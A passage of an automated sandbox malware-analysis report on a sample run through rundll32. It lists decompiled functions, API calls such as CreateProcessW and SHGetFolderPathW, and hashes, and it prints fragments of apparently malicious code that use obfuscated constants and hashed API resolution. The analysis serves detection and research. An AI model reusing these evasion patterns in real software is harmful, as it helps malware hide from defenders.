                                                                                                                    • Associated: 0000000B.00000002.544628440.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                    • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                    • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                    • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00357F5D Relevance: 1.6, APIs: 1, Instructions: 54processCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 275 357f5d-357ff1 call 3620b9 call 36aa30 CreateProcessW
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0035AD99,?,?,?,181C8C04,0035AD99), ref: 00357FEB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544143882.0000000000350000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544169639.0000000000373000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_350000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                    • Instruction ID: 67493390a63192565c6692d5d2e9b810ea0e9a74f58fd73f0d09d58dde647ddb
                                                                                                                    • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                    • Instruction Fuzzy Hash: B511D372402128BBDF629F91DD09CEF7F79EF093A4F149144FA1925121D2728A60EBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003646BB Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 280 3646bb-36473b call 3620b9 call 36aa30 SHGetFolderPathW
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E003646BB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E003620B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E0036AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}










                                                                                                                    0x003646d5
                                                                                                                    0x003646da
                                                                                                                    0x003646e4
                                                                                                                    0x003646ec
                                                                                                                    0x003646f3
                                                                                                                    0x003646f7
                                                                                                                    0x003646fe
                                                                                                                    0x00364705
                                                                                                                    0x0036470c
                                                                                                                    0x00364724
                                                                                                                    0x00364735
                                                                                                                    0x0036473b

                                                                                                                    APIs
                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00364735
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544143882.0000000000350000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544169639.0000000000373000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_350000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderPath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1514166925-0
                                                                                                                    • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                    • Instruction ID: 88daeeae8280efb800bab7eae321b5e3b19ee9df9ddb2c05b39f1f19e4b8a922
                                                                                                                    • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                    • Instruction Fuzzy Hash: 2301EC75801218BBCF15AFD5DC498DFBFB8EF45394F108145F91866211D2758A60DBD1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003593ED Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 285 3593ed-359461 call 36aa30 ExitProcess
                                                                                                                    C-Code - Quality: 73%
                                                                                                                    			E003593ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E0036AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}








                                                                                                                    0x003593f3
                                                                                                                    0x00359405
                                                                                                                    0x00359411
                                                                                                                    0x00359412
                                                                                                                    0x00359413
                                                                                                                    0x0035941a
                                                                                                                    0x00359421
                                                                                                                    0x00359428
                                                                                                                    0x00359433
                                                                                                                    0x00359436
                                                                                                                    0x0035943d
                                                                                                                    0x00359444
                                                                                                                    0x00359451
                                                                                                                    0x0035945b

                                                                                                                    APIs
                                                                                                                    • ExitProcess.KERNELBASE(00000000), ref: 0035945B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544143882.0000000000350000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544169639.0000000000373000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_350000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 621844428-0
                                                                                                                    • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                    • Instruction ID: 884355c262a7d26c596c9815b2c7dae278c60910631b12c29d95fa6c395fb61a
                                                                                                                    • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                    • Instruction Fuzzy Hash: 88F03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9DA04B7261E7705F459A91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0035B23C Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 305 35b23c-35b2c6 call 3620b9 call 36aa30 lstrcmpiW
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E0035B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003620B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E0036AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}







                                                                                                                    0x0035b23f
                                                                                                                    0x0035b240
                                                                                                                    0x0035b241
                                                                                                                    0x0035b244
                                                                                                                    0x0035b247
                                                                                                                    0x0035b24a
                                                                                                                    0x0035b24e
                                                                                                                    0x0035b24f
                                                                                                                    0x0035b254
                                                                                                                    0x0035b25e
                                                                                                                    0x0035b26a
                                                                                                                    0x0035b271
                                                                                                                    0x0035b278
                                                                                                                    0x0035b27f
                                                                                                                    0x0035b286
                                                                                                                    0x0035b28d
                                                                                                                    0x0035b294
                                                                                                                    0x0035b29b
                                                                                                                    0x0035b2b3
                                                                                                                    0x0035b2c1
                                                                                                                    0x0035b2c6

                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 0035B2C1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544143882.0000000000350000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.544169639.0000000000373000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_350000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1586166983-0
                                                                                                                    • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                    • Instruction ID: ee8f51d14b79bb4de0034b5e5a8fff4a9f0d118976ad77c37a1796209bfee1de
                                                                                                                    • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                    • Instruction Fuzzy Hash: A00116B2C04608FFDF45DFD4DD468AEBBB5EB44304F208189B90566262E3728B60AB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%